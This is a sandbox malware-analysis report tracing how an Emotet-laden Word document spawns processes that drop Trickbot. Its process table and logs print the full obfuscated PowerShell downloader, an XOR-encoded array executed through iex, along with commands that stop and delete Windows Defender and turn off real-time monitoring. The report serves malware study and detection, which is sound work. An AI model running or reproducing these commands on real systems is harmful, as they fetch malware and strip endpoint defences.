Emotet Drops Trickbot (25-Jun-18) | Sequential Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win7_64_sp1-mso2007 | ms_office
Classification: Exploit, Dropper, Downloader

3985bc09caa13dadf70187a20d271303c272a41404beb497ac6116a5722a05d1 (SHA256)

022543.doc

Word Document

Created at 2018-06-25 14:51:00

Notifications (1/1)

The operating system was rebooted during the analysis.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x940 Analysis Target Medium winword.exe "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" -
#2 0xa08 Child Process Medium powershell.exe PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'') #1
#3 0xb40 Child Process Medium 280.exe "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe" #2
#4 0xb50 Child Process Medium 280.exe "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe" #3
#5 0xb64 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" #4
#6 0xb70 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" #5
#8 0x4f4 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" #6
#9 0x64 Child Process Medium oyvgkgw.exe "C:\ProgramData\oyvGkGw.exe" #6
#10 0x8a0 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" #6
#11 0x728 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" #6
#12 0x834 Child Process Medium syncpack_.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" #6
#13 0x7b4 Child Process Medium surtq5qk9h.exe "C:\ProgramData\suRtQ5QK9h.exe" #6
#14 0x62c Child Process Medium oyvgkgw.exe "C:\ProgramData\oyvGkGw.exe" #9
#15 0x13c Child Process Medium cmd.exe /c sc stop WinDefend #14
#16 0x77c Child Process Medium cmd.exe /c sc delete WinDefend #14
#17 0x648 Child Process Medium cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true #14
#18 0x914 Child Process Medium powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true #17
#19 0x9a4 Child Process Medium sc.exe sc delete WinDefend #16
#20 0x9d8 Child Process Medium sc.exe sc stop WinDefend #15
#21 0x200 RPC Server High (Elevated) dllhost.exe C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} #14
#22 0x3d4 Child Process High (Elevated) oyvhkhw.exe "C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe" #21

Behavior Information - Sequential View

Process #1: winword.exe
42 0
»
Information Value
ID #1
File Name c:\program files (x86)\microsoft office\office12\winword.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:00:52, Reason: Analysis Target
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:04:16
OS Process Information
»
Information Value
PID 0x940
Parent PID 0x520 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9A0
0x 99C
0x 998
0x 994
0x 990
0x 968
0x 944
0x 9F4
0x 9F8
0x 9FC
0x A04
0x A2C
0x B84
0x B90
0x 85C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000000000020000 0x00020000 0x00022fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000030000 0x00030000 0x00032fff Pagefile Backed Memory Readable False False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable False False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable False False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable False False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable False False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory Readable, Writable False False False -
private_0x0000000000150000 0x00150000 0x0017afff Private Memory Readable, Writable False False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000190000 0x00190000 0x00192fff Pagefile Backed Memory Readable False False False -
private_0x00000000001a0000 0x001a0000 0x001a3fff Private Memory Readable, Writable False False False -
private_0x00000000001b0000 0x001b0000 0x001c7fff Private Memory Readable, Writable False False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable False False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable False False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable False False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory - False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable False False False -
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory Readable, Writable False False False -
private_0x0000000000230000 0x00230000 0x0023ffff Private Memory Readable, Writable False False False -
private_0x0000000000240000 0x00240000 0x0024ffff Private Memory Readable, Writable False False False -
private_0x0000000000250000 0x00250000 0x0034ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000350000 0x00350000 0x004d7fff Pagefile Backed Memory Readable False False False -
private_0x00000000004e0000 0x004e0000 0x004effff Private Memory - False False False -
private_0x00000000004f0000 0x004f0000 0x004fffff Private Memory Readable, Writable False False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory Readable, Writable False False False -
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable False False False -
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory Readable, Writable False False False -
private_0x0000000000530000 0x00530000 0x005affff Private Memory Readable, Writable False False False -
pagefile_0x00000000005b0000 0x005b0000 0x00730fff Pagefile Backed Memory Readable False False False -
private_0x0000000000740000 0x00740000 0x0074ffff Private Memory Readable, Writable False False False -
private_0x0000000000750000 0x00750000 0x0075ffff Private Memory Readable, Writable False False False -
private_0x0000000000760000 0x00760000 0x0076ffff Private Memory Readable, Writable False False False -
private_0x0000000000770000 0x00770000 0x0077ffff Private Memory Readable, Writable False False False -
private_0x0000000000780000 0x00780000 0x0078ffff Private Memory Readable, Writable False False False -
private_0x0000000000790000 0x00790000 0x0088ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000890000 0x00890000 0x01c8ffff Pagefile Backed Memory Readable False False False -
office.odf 0x01c90000 0x01ec9fff Memory Mapped File Readable False False False -
pagefile_0x0000000001ed0000 0x01ed0000 0x01faefff Pagefile Backed Memory Readable False False False -
private_0x0000000001fb0000 0x01fb0000 0x01feffff Private Memory Readable, Writable False False False -
private_0x0000000001ff0000 0x01ff0000 0x01ffffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002000000 0x02000000 0x02001fff Pagefile Backed Memory Readable False False False -
sortdefault.nls 0x02010000 0x022defff Memory Mapped File Readable False False False -
private_0x00000000022e0000 0x022e0000 0x022fffff Private Memory Readable, Writable False False False -
private_0x0000000002300000 0x02300000 0x0230ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002310000 0x02310000 0x02310fff Pagefile Backed Memory Readable False False False -
private_0x0000000002320000 0x02320000 0x0232ffff Private Memory Readable, Writable False False False -
private_0x0000000002330000 0x02330000 0x0233ffff Private Memory Readable, Writable False False False -
private_0x0000000002340000 0x02340000 0x0234ffff Private Memory Readable, Writable False False False -
private_0x0000000002350000 0x02350000 0x0235ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002360000 0x02360000 0x02360fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002370000 0x02370000 0x0237ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002380000 0x02380000 0x02386fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002390000 0x02390000 0x02391fff Pagefile Backed Memory Readable, Writable False False False -
private_0x00000000023a0000 0x023a0000 0x023a0fff Private Memory Readable, Writable, Executable False False False -
private_0x00000000023b0000 0x023b0000 0x023b0fff Private Memory Readable, Writable False False False -
pagefile_0x00000000023c0000 0x023c0000 0x023c0fff Pagefile Backed Memory Readable False False False -
private_0x00000000023d0000 0x023d0000 0x023dffff Private Memory Readable, Writable False False False -
private_0x00000000023e0000 0x023e0000 0x023effff Private Memory Readable, Writable False False False -
private_0x00000000023f0000 0x023f0000 0x0242ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002430000 0x02430000 0x02430fff Pagefile Backed Memory Readable False False False -
private_0x0000000002440000 0x02440000 0x0247ffff Private Memory Readable, Writable False False False -
staticcache.dat 0x02480000 0x02daffff Memory Mapped File Readable False False False -
pagefile_0x0000000002db0000 0x02db0000 0x02db0fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002dc0000 0x02dc0000 0x02dc0fff Pagefile Backed Memory Readable False False False -
private_0x0000000002dd0000 0x02dd0000 0x02ddffff Private Memory Readable, Writable False False False -
private_0x0000000002de0000 0x02de0000 0x02deffff Private Memory Readable, Writable False False False -
private_0x0000000002df0000 0x02df0000 0x02dfffff Private Memory Readable, Writable False False False -
private_0x0000000002e00000 0x02e00000 0x02e0ffff Private Memory Readable, Writable False False False -
private_0x0000000002e10000 0x02e10000 0x02e1ffff Private Memory Readable, Writable False False False -
private_0x0000000002e20000 0x02e20000 0x02e2ffff Private Memory Readable, Writable False False False -
private_0x0000000002e30000 0x02e30000 0x02e3ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002e40000 0x02e40000 0x02e41fff Pagefile Backed Memory Readable False False False -
private_0x0000000002e50000 0x02e50000 0x02e5ffff Private Memory Readable, Writable False False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x02e60000 0x02e7efff Memory Mapped File Readable False False False -
pagefile_0x0000000002e80000 0x02e80000 0x02e80fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002e90000 0x02e90000 0x02e9ffff Private Memory Readable, Writable False False False -
private_0x0000000002ea0000 0x02ea0000 0x02edffff Private Memory Readable, Writable, Executable False False False -
msxml5r.dll 0x02ee0000 0x02ef6fff Memory Mapped File Readable False False False -
private_0x0000000002f00000 0x02f00000 0x02f0ffff Private Memory Readable, Writable False False False -
private_0x0000000002f10000 0x02f10000 0x02f1ffff Private Memory Readable, Writable False False False -
private_0x0000000002f20000 0x02f20000 0x02f2ffff Private Memory Readable, Writable False False False -
private_0x0000000002f30000 0x02f30000 0x02faffff Private Memory Readable, Writable False False False -
private_0x0000000002fb0000 0x02fb0000 0x02fbffff Private Memory Readable, Writable False False False -
private_0x0000000002fc0000 0x02fc0000 0x02ffffff Private Memory Readable, Writable False False False -
private_0x0000000003000000 0x03000000 0x0303ffff Private Memory Readable, Writable False False False -
private_0x0000000003040000 0x03040000 0x0304ffff Private Memory Readable, Writable False False False -
private_0x0000000003050000 0x03050000 0x0305ffff Private Memory Readable, Writable False False False -
private_0x0000000003060000 0x03060000 0x0306ffff Private Memory Readable, Writable False False False -
private_0x0000000003070000 0x03070000 0x0307ffff Private Memory Readable, Writable False False False -
private_0x0000000003080000 0x03080000 0x0308ffff Private Memory Readable, Writable False False False -
private_0x0000000003090000 0x03090000 0x030cffff Private Memory Readable, Writable, Executable False False False -
pagefile_0x00000000030d0000 0x030d0000 0x034c2fff Pagefile Backed Memory Readable False False False -
private_0x00000000034d0000 0x034d0000 0x034dffff Private Memory Readable, Writable False False False -
private_0x00000000034e0000 0x034e0000 0x0351ffff Private Memory Readable, Writable False False False -
private_0x0000000003520000 0x03520000 0x0352ffff Private Memory Readable, Writable False False False -
private_0x0000000003530000 0x03530000 0x0353ffff Private Memory Readable, Writable False False False -
private_0x0000000003540000 0x03540000 0x0357ffff Private Memory Readable, Writable False False False -
private_0x0000000003580000 0x03580000 0x0358ffff Private Memory Readable, Writable False False False -
private_0x0000000003590000 0x03590000 0x0359ffff Private Memory Readable, Writable False False False -
private_0x00000000035a0000 0x035a0000 0x035affff Private Memory Readable, Writable False False False -
private_0x00000000035b0000 0x035b0000 0x035effff Private Memory Readable, Writable False False False -
private_0x00000000035f0000 0x035f0000 0x0362ffff Private Memory Readable, Writable False False False -
private_0x0000000003630000 0x03630000 0x0363ffff Private Memory Readable, Writable False False False -
private_0x0000000003640000 0x03640000 0x0364efff Private Memory Readable, Writable False False False -
private_0x0000000003650000 0x03650000 0x0374ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000003750000 0x03750000 0x03b4ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000003b50000 0x03b50000 0x03b51fff Private Memory Readable, Writable False False False -
msctf.dll.mui 0x03b60000 0x03b60fff Memory Mapped File Readable, Writable False False False -
private_0x0000000003b70000 0x03b70000 0x03b7ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000003b80000 0x03b80000 0x03b80fff Pagefile Backed Memory Readable False False False -
private_0x0000000003b90000 0x03b90000 0x03c8ffff Private Memory Readable, Writable False False False -
private_0x0000000003c90000 0x03c90000 0x03d8ffff Private Memory Readable, Writable False False False -
kernelbase.dll.mui 0x03d90000 0x03e4ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000003e50000 0x03e50000 0x03e71fff Private Memory Readable, Writable False False False -
private_0x0000000003e80000 0x03e80000 0x03e8ffff Private Memory Readable, Writable False False False -
private_0x0000000003e90000 0x03e90000 0x0428ffff Private Memory Readable, Writable False False False -
private_0x0000000004290000 0x04290000 0x042a5fff Private Memory Readable, Writable False False False -
private_0x00000000042b0000 0x042b0000 0x042bffff Private Memory Readable, Writable False False False -
private_0x00000000042c0000 0x042c0000 0x042c5fff Private Memory Readable, Writable False False False -
private_0x00000000042d0000 0x042d0000 0x042d0fff Private Memory Readable, Writable False False False -
private_0x00000000042e0000 0x042e0000 0x0431ffff Private Memory Readable, Writable False False False -
private_0x0000000004320000 0x04320000 0x04320fff Private Memory Readable, Writable False False False -
private_0x0000000004330000 0x04330000 0x04338fff Private Memory Readable, Writable False False False -
private_0x0000000004340000 0x04340000 0x0434ffff Private Memory Readable, Writable False False False -
private_0x0000000004350000 0x04350000 0x04358fff Private Memory Readable, Writable False False False -
private_0x0000000004360000 0x04360000 0x04373fff Private Memory Readable, Writable False False False -
private_0x0000000004390000 0x04390000 0x04392fff Private Memory Readable, Writable False False False -
private_0x00000000043a0000 0x043a0000 0x043b2fff Private Memory Readable, Writable False False False -
private_0x0000000004410000 0x04410000 0x0444ffff Private Memory Readable, Writable False False False -
private_0x00000000044c0000 0x044c0000 0x045bffff Private Memory Readable, Writable False False False -
private_0x0000000004620000 0x04620000 0x0471ffff Private Memory Readable, Writable False False False -
private_0x0000000004720000 0x04720000 0x04adefff Private Memory Readable, Writable False False False -
private_0x0000000004bd0000 0x04bd0000 0x04c0ffff Private Memory Readable, Writable False False False -
private_0x0000000004c90000 0x04c90000 0x04d8ffff Private Memory Readable, Writable False False False -
private_0x0000000004d90000 0x04d90000 0x04e8ffff Private Memory Readable, Writable False False False -
winword.exe 0x2fc50000 0x2fca6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp80.dll 0x70290000 0x70316fff Memory Mapped File Readable, Writable, Executable False False False -
msproof6.dll 0x70320000 0x703d5fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x70420000 0x7044dfff Memory Mapped File Readable, Writable, Executable False False False -
msointl.dll 0x70450000 0x70e2cfff Memory Mapped File Readable, Writable, Executable False False False -
msores.dll 0x70e30000 0x71483fff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x71490000 0x724a7fff Memory Mapped File Readable, Writable, Executable False False False -
oart.dll 0x724b0000 0x7322ffff Memory Mapped File Readable, Writable, Executable False False False -
wwlib.dll 0x73230000 0x742dbfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 217 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0x944
42 0
»
Category Operation Information Success Count Logfile
System Get Time type = Local Time, time = 2018-06-26 00:52:11 (Local Time) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:52:13 (Local Time) True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = KERNEL32.DLL, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = FlsAlloc, address_out = 0x75fc4f2b True 1
Fn
Module Get Address module_name = Unknown module name, function = FlsGetValue, address_out = 0x75fc1252 True 1
Fn
Module Get Address module_name = Unknown module name, function = FlsSetValue, address_out = 0x75fc4208 True 1
Fn
Module Get Address module_name = Unknown module name, function = FlsFree, address_out = 0x75fc359f True 1
Fn
Module Get Handle module_name = kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75fc1916 True 1
Fn
Module Get Handle module_name = KERNEL32.DLL, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = EncodePointer, address_out = 0x77c20fcb True 1
Fn
Module Get Address module_name = Unknown module name, function = DecodePointer, address_out = 0x77c19d35 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Get Filename process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE, size = 260 True 1
Fn
Module Get Handle module_name = KERNEL32, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\program files (x86)\microsoft office\office12\winword.exe, base_address = 0x2fc50000 True 1
Fn
Module Get Filename process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 True 1
Fn
Module Load module_name = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL, base_address = 0x65300000 True 1
Fn
Module Get Filename process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 True 1
Fn
Registry Read Value reg_name = 8804558B-B773-11d1-BC3E-0000F87552E7, data = } False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = USER32, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Module Get Address module_name = Unknown module name, function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Module Get Address module_name = Unknown module name, function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Module Get Address module_name = Unknown module name, function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Module Get Address module_name = Unknown module name, function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Module Get Address module_name = Unknown module name, function = EnumDisplayDevicesA, address_out = 0x771e4572 True 1
Fn
Module Get Handle module_name = ole32.dll, base_address = 0x75be0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Module Get Address module_name = Unknown module name, function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Module Get Filename process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 True 1
Fn
File Create Directory C:\Users\kFT6uTQW\AppData\Local\Temp\VBE True 1
Fn
Process Create process_name = PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'') , os_pid = 0xa08, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Process #2: powershell.exe
761 83
»
Information Value
ID #2
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'')
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:01:06, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:04:02
OS Process Information
»
Information Value
PID 0xa08
Parent PID 0x940 (c:\program files (x86)\microsoft office\office12\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A0C
0x A20
0x A24
0x A28
0x A30
0x A34
0x A90
0x AA0
0x AA4
0x AA8
0x B3C
0x B48
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
